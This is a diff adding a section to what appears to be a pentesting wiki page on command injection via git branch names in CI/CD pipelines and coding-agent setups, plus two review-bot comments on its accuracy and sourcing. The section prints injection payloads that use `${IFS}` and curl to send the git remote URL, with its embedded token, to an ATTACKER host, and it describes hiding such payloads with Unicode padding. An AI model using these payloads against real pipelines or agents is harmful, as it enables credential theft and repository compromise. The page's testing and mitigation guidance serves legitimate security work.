56 changes: 56 additions & 0 deletions src/pentesting-web/command-injection.md
@@ -266,6 +266,61 @@ java.lang.Runtime.getRuntime().exec(cmd);
- Swap the callback for a reverse shell; if the UI/PoC cannot handle pipes/redirects, stage a payload with one command and exec it with a second request.
- Horizon3's [CVE-2023-27350.py](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py) automates the auth bypass, config flips, command execution, and rollback—run it through an upstream proxy (e.g., `proxychains` → Squid) when the service is only reachable internally.

## Git branch/ref name injection in CI/CD, code review and coding-agent setup

Some automation platforms accept a **repository + branch/ref** and later interpolate that value into a **shell command** during checkout, setup, review, or deployment. If the branch/ref reaches a shell without strict allowlisting or safe argument separation, **Git metadata becomes a command injection primitive**.

Typical vulnerable patterns:

- `git fetch origin $BRANCH`
- `git checkout $REF`
- `sh -c "git fetch origin $branch && git checkout $branch"`
- setup wrappers that log, clone, or review `refs/heads/...` values inside Bash

This matters in **CI/CD**, **GitHub Actions helpers**, **self-hosted review bots**, and **cloud coding agents** because branch names are often attacker-controlled in fork/PR workflows or by anyone who can create refs in the repo.

### What to test

1. Create a benign-looking branch name that should break command parsing, such as `-1`, and verify whether checkout/setup logs show syntax or git errors.
2. If spaces are blocked by the Git provider, replace them with `${IFS}` so Bash recreates whitespace at execution time.
3. Try shell metacharacters and command substitution inside the ref:

```bash
main;id;
main;curl${IFS}http://ATTACKER/$(whoami);
main;curl${IFS}http://ATTACKER/`git${IFS}remote${IFS}get-url${IFS}origin`;
```

4. If the UI truncates or visually hides branch names, test Unicode padding or unusual whitespace to disguise the payload while keeping the shell-relevant bytes intact.

### High-value post-exploitation target: authenticated git remotes

During early clone/setup stages, many systems temporarily configure `origin` with an embedded **PAT/OAuth token / installation token**:

```bash
git remote get-url origin
```

If command execution lands **before the token is removed/redacted**, this often leaks credentials that can be reused against GitHub/GitLab/Bitbucket or the CI provider itself.

Common exfiltration paths:

- Write the remote URL to a file and coerce the agent/review task to print that file later.
- Send it directly to attacker infrastructure:

```bash
main;curl${IFS}http://ATTACKER/`git${IFS}remote${IFS}get-url${IFS}origin`;
```

- Read task history/log APIs if the platform exposes backend endpoints that return job output without requiring UI interaction.

### Practical notes

- Branch restrictions are not enough. Git providers may block literal spaces but still allow strings such as `${IFS}`, metacharacters, or Unicode separators that become dangerous only when evaluated by a shell.
- This is especially dangerous when the malicious branch is set as the **default branch** or used in **automated code review** flows, because every victim job becomes a trigger.
- If the application uses `execve`/`subprocess.run([...])`/`execFile()` with each argument split safely, ref names stop being shell syntax and the bug usually disappears.
- If you are testing CI/CD abuse more broadly, see [Pentesting CI/CD](https://cloud.hacktricks.wiki/en/pentesting-ci-cd/pentesting-ci-cd-methodology.html).

## Brute-Force Detection List


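Review bot: the mitigation bullet in "Practical notes" ("`execve`/`subprocess.run([...])`/`execFile()` ... the bug usually disappears") overstates what a split argv buys, and step 1 of "What to test" mislabels the `-1` probe. A branch named `-1` is not shell syntax: it reaches git's own argv intact and is parsed as an option, so it probes argument injection, which a correctly split argv does not stop. Suggest rewording step 1 to say it tests whether the ref is handed to git in an option position, and extending the mitigation bullet with the git-side controls: validate the value with `git check-ref-format --branch "$branch"` (which, unlike the plain refname rules, rejects a leading dash) and pass it fully qualified, e.g. `git fetch origin "refs/heads/$branch"`, so it can never start with `-`. Step 2 should also say that spaces are rejected by git's refname rules everywhere, not only "by the Git provider"; that is why `${IFS}` is the substitute, and why the characters git does allow (`;`, backticks, `$`, `{`, `}`, `|`, `&`) are the ones to enumerate when the value hits `sh -c`.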
@@ -287,5 +342,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
- [HTB: Gavel](https://0xdf.gitlab.io/2026/03/14/htb-gavel.html)
- [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py)
- [Unit 42 – Bash arithmetic expansion RCE in Ivanti RewriteMap scripts](https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/)
- [BeyondTrust: How Command Injection Vulnerability in OpenAI Codex Leads to GitHub Token Compromise](https://www.beyondtrust.com/blog/entry/openai-codex-command-injection-vulnerability-github-token)

{{#include ../banners/hacktricks-training.md}}
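Review bot: the new reference entry is the only place the source of the branch/ref-injection section is named, and nothing in that section links to it or names the product it describes ("cloud coding agents" is as specific as the body gets), so a reader cannot connect the `git remote get-url origin` token-leak technique above to this write-up. Suggest citing it inline in the section (for example at the "High-value post-exploitation target: authenticated git remotes" heading) in addition to the reference list. The entry itself follows the list's `- [title](url)` format, so no style change is needed.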